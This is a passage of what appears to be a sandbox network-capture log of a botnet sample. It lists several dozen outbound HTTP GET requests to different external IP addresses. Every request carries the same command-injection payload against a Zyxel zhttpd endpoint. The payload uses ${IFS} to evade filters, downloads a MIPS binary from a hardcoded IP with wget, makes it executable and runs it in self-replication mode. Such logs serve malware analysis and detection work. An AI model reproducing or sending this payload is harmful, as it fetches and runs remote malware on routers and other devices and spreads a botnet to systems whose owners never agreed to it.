                                                  Jan 19, 2024 18:23:40.736726046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  748192.168.2.1358080176.23.165.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736764908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  749192.168.2.1358238146.147.250.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736800909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  750192.168.2.1336462113.242.84.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736846924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  751192.168.2.1351734223.15.171.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736876011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  752192.168.2.135362046.228.199.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736905098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  753192.168.2.1344300106.230.145.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.736962080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  754192.168.2.135815834.132.57.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737010956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  755192.168.2.1353984216.146.177.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737032890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  756192.168.2.135380662.83.193.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737057924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  757192.168.2.1335516180.6.170.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737118006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  758192.168.2.134677238.106.89.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737175941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  759192.168.2.134314073.41.191.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737191916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  760192.168.2.1350694107.51.179.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737231970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  761192.168.2.134036620.10.237.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737277985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  762192.168.2.1332782112.202.39.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737308979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  763192.168.2.1359666187.193.113.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737345934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  764192.168.2.1360516204.249.120.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737396002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  765192.168.2.1357916169.81.202.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737442017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  766192.168.2.1351040190.250.86.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737487078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  767192.168.2.1340826105.23.78.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737509966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  768192.168.2.1348600101.42.93.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737548113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  769192.168.2.134932252.0.127.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737605095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  770192.168.2.1353444193.89.113.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737621069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  771192.168.2.1350420103.108.63.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737663984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  772192.168.2.1337662177.193.6.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737711906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  773192.168.2.133964289.156.116.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737767935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  774192.168.2.134637012.6.149.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737797976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  775192.168.2.1359990156.64.97.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737817049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  776192.168.2.1340348122.143.51.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737857103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  777192.168.2.134788435.39.24.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737921000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  778192.168.2.1360940204.184.60.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737938881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  779192.168.2.1345958117.18.81.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.737965107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  780192.168.2.1338746223.72.18.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738023043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  781192.168.2.134436823.107.74.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738061905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  782192.168.2.1348000134.32.26.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738085985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  783192.168.2.1336170209.169.227.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738111019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  784192.168.2.1344000218.45.194.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738178968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  785192.168.2.1335536124.97.76.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738229036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  786192.168.2.1358888155.36.11.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738261938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  787192.168.2.134414453.134.86.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738306046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  788192.168.2.1335368162.133.21.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738341093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  789192.168.2.13476324.170.78.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738373041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  790192.168.2.136095057.156.131.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738409996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  791192.168.2.1351822192.250.208.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738454103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  792192.168.2.1339936117.20.59.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738483906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  793192.168.2.13412864.57.121.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738521099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  794192.168.2.1344342198.167.188.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738575935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  795192.168.2.135403635.228.181.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738610983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  796192.168.2.133467444.245.123.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738650084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  797192.168.2.1336786181.80.147.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738693953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  798192.168.2.13517042.217.33.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738733053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  799192.168.2.13535208.114.112.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738769054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  800192.168.2.1343762121.168.148.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738811016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  801192.168.2.133698889.245.16.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738863945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  802192.168.2.135114080.33.203.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738903046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  803192.168.2.133799471.6.54.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738934994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  804192.168.2.1352752171.79.45.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738991976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  805192.168.2.134510085.155.73.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.738998890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  806192.168.2.135117682.146.156.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739032030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  807192.168.2.134837080.89.54.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739056110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  808192.168.2.1340410220.230.21.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739114046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  809192.168.2.1342004122.218.250.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.739146948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  810192.168.2.1352778184.165.138.66443
                                                  TimestampBytes transferredDirectionData
